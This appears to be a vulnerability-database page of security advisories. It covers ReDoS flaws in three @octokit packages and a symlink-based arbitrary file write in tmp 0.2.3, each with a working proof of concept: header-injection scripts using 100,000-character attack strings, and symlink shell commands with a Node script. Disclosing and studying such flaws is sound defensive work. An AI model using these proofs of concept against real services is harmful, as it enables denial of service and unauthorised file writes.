All the vulnerabilities related to the version 10.45.0 of the package
@octokit/request has a Regular Expression in fetchWrapper that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
The regular expression /<([^>]+)>; rel="deprecation"/
used to match the link
header in HTTP responses is vulnerable to a ReDoS (Regular Expression Denial of Service) attack. This vulnerability arises due to the unbounded nature of the regex's matching behavior, which can lead to catastrophic backtracking when processing specially crafted input. An attacker could exploit this flaw by sending a malicious link
header, resulting in excessive CPU usage and potentially causing the server to become unresponsive, impacting service availability.
The vulnerability resides in the regular expression /<([^>]+)>; rel="deprecation"/
, which is used to match the link
header in HTTP responses. This regular expression captures content between angle brackets (<>
) followed by ; rel="deprecation"
. However, the pattern is vulnerable to ReDoS (Regular Expression Denial of Service) attacks due to its susceptibility to catastrophic backtracking when processing malicious input.
An attacker can exploit this vulnerability by sending a specially crafted link
header designed to trigger excessive backtracking. For example, the following headers:
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
The crafted link
header consists of 100,000 consecutive <
characters followed by a closing >
. This input forces the regular expression engine to backtrack extensively in an attempt to match the pattern. As a result, the server can experience a significant increase in CPU usage, which may lead to denial of service, making the server unresponsive or even causing it to crash under load.
The issue is present in the following code:
const matches = responseHeaders.link && responseHeaders.link.match(/<([^>]+)>; rel="deprecation"/);
In this scenario, the link
header value triggers the regex to perform excessive backtracking, resulting in resource exhaustion and potentially causing the service to become unavailable.
import { request } from "@octokit/request";
const originalFetch = globalThis.fetch;
globalThis.fetch = async (url, options) => {
const response = await originalFetch(url, options);
const fakeHeaders = new Headers(response.headers);
fakeHeaders.set("link", "<".repeat(100000) + ">");
fakeHeaders.set("deprecation", "true");
return new Response(response.body, {
status: response.status,
statusText: response.statusText,
headers: fakeHeaders
});
};
request("GET /repos/octocat/hello-world")
.then(response => {
// console.log("[+] Response received:", response);
})
.catch(error => {
// console.error("[-] Error:", error);
});
// globalThis.fetch = originalFetch;
This is a Denial of Service (DoS) vulnerability caused by a ReDoS (Regular Expression Denial of Service) flaw. The vulnerability allows an attacker to craft a malicious link
header that exploits the inefficient backtracking behavior of the regular expression used in the code.
The primary impact is the potential for server resource exhaustion, specifically high CPU usage, which can cause the server to become unresponsive or even crash when processing the malicious request. This affects the availability of the service, leading to downtime or degraded performance.
The vulnerability impacts any system that uses this specific regular expression to process link
headers in HTTP responses. This can include:
link
header, making it a low-barrier attack that could be exploited by anyone.@octokit/request-error has a Regular Expression in index that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
A Regular Expression Denial of Service (ReDoS) vulnerability exists in the processing of HTTP request headers. By sending an authorization header containing an excessively long sequence of spaces followed by a newline and "@", an attacker can exploit inefficient regular expression processing, leading to excessive resource consumption. This can significantly degrade server performance or cause a denial-of-service (DoS) condition, impacting availability.
The issue occurs at line 52 of iterator.ts in the @octokit/request-error repository.
The vulnerability is caused by the use of an inefficient regular expression in the handling of the authorization
header within the request processing logic:
authorization: options.request.headers.authorization.replace(
/ .*$/,
" [REDACTED]"
)
The regular expression / .*$/
matches a space followed by any number of characters until the end of the line. This pattern is vulnerable to Regular Expression Denial of Service (ReDoS) when processing specially crafted input. Specifically, an attacker can send an authorization
header containing a long sequence of spaces followed by a newline and "@", such as:
headers: {
authorization: "" + " ".repeat(100000) + "\n@",
}
Due to the way JavaScript's regular expression engine backtracks while attempting to match the space followed by arbitrary characters, this input can cause excessive CPU usage, significantly slowing down or even freezing the server. This leads to a denial-of-service condition, impacting availability.
import { RequestError } from "@octokit/request-error";
const error = new RequestError("Oops", 500, {
request: {
method: "POST",
url: "https://api.github.com/foo",
body: {
bar: "baz",
},
headers: {
authorization: ""+" ".repeat(100000)+"\n@",
},
},
response: {
status: 500,
url: "https://api.github.com/foo",
headers: {
"x-github-request-id": "1:2:3:4",
},
data: {
foo: "bar",
},
},
});
This is a Regular Expression Denial of Service (ReDoS) vulnerability
, which occurs due to an inefficient regular expression (/ .*$/
) used to sanitize the authorization
header. An attacker can craft a malicious input that triggers excessive backtracking in the regex engine, leading to high CPU consumption and potential denial-of-service (DoS).
authorization
headers are at risk, especially those processing a large volume of authentication requests.@octokit/plugin-paginate-rest has a Regular Expression in iterator Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
For the npm package @octokit/plugin-paginate-rest
, when calling octokit.paginate.iterator()
, a specially crafted octokit
instance—particularly with a malicious link
parameter in the headers
section of the request
—can trigger a ReDoS attack.
The issue occurs at line 39 of iterator.ts in the @octokit/plugin-paginate-rest repository. The relevant code is as follows:
url = ((normalizedResponse.headers.link || "").match(
/<([^>]+)>;\s*rel="next"/,
) || [])[1];
The regular expression /<([^>]+)>;\s*rel="next"/
may lead to a potential backtracking vulnerability, resulting in a ReDoS (Regular Expression Denial of Service) attack. This could cause high CPU utilization and even service slowdowns or freezes when processing specially crafted Link
headers.
import { Octokit } from "@octokit/core";
import { paginateRest } from "@octokit/plugin-paginate-rest";
const MyOctokit = Octokit.plugin(paginateRest);
const octokit = new MyOctokit({
auth: "your-github-token",
});
// Intercept the request to inject a malicious 'link' header for ReDoS
octokit.hook.wrap("request", async (request, options) => {
const maliciousLinkHeader = "" + "<".repeat(100000) + ">"; // attack string
return {
data: [],
headers: {
link: maliciousLinkHeader, // Inject malicious 'link' header
},
};
});
// Trigger the ReDoS attack by paginating through GitHub issues
(async () => {
try {
for await (const normalizedResponse of octokit.paginate.iterator(
"GET /repos/{owner}/{repo}/issues", { owner: "DayShift", repo: "ReDos", per_page: 100 }
)) {
console.log({ normalizedResponse });
}
} catch (error) {
console.error("Error encountered:", error);
}
})();
This is a Regular Expression Denial of Service (ReDoS) vulnerability, which occurs due to excessive backtracking in the regex pattern:
/<([^>]+)>;\s*rel="next"/
When processing a specially crafted Link
header, this regex can cause significant performance degradation, leading to high CPU utilization and potential service unresponsiveness.
@octokit/plugin-paginate-rest
who call octokit.paginate.iterator()
and process untrusted or manipulated Link
headers.tmp allows arbitrary temporary file / directory write via symbolic link dir
parameter
tmp@0.2.3
is vulnerable to an Arbitrary temporary file / directory write via symbolic link dir
parameter.
According to the documentation there are some conditions that must be held:
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50
Other breaking changes, i.e.
- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks
are still in place.
In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
absolute paths are fine as long as they point to a location under the system's default temporary directory.
Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access,
as tmp will not check the availability of the path, nor will it establish the requested path for you.
Related issue: https://github.com/raszi/node-tmp/issues/207.
The issue occurs because _resolvePath
does not properly handle symbolic link when resolving paths:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
if (name.startsWith(tmpDir)) {
return path.resolve(name);
} else {
return path.resolve(path.join(tmpDir, name));
}
}
If the dir
parameter points to a symlink that resolves to a folder outside the tmpDir
, it's possible to bypass the _assertIsRelative
check used in _assertAndSanitizeOptions
:
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir
is possible.
Tested on a Linux machine.
tmpDir
that points to a directory outside of itmkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
ls -lha $HOME/mydir1 | grep "tmp-"
node main.js
File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf
test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]'
test 2: dir option must be relative to "/tmp", found "/foo".
test 3: dir option must be relative to "/tmp", found "/home/user/mydir1".
$HOME/mydir1
(outside the tmpDir
):ls -lha $HOME/mydir1 | grep "tmp-"
-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]
main.js
// npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
A Potential fix could be to call fs.realpathSync
(or similar) that resolves also symbolic links.
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Arbitrary temporary file / directory write via symlink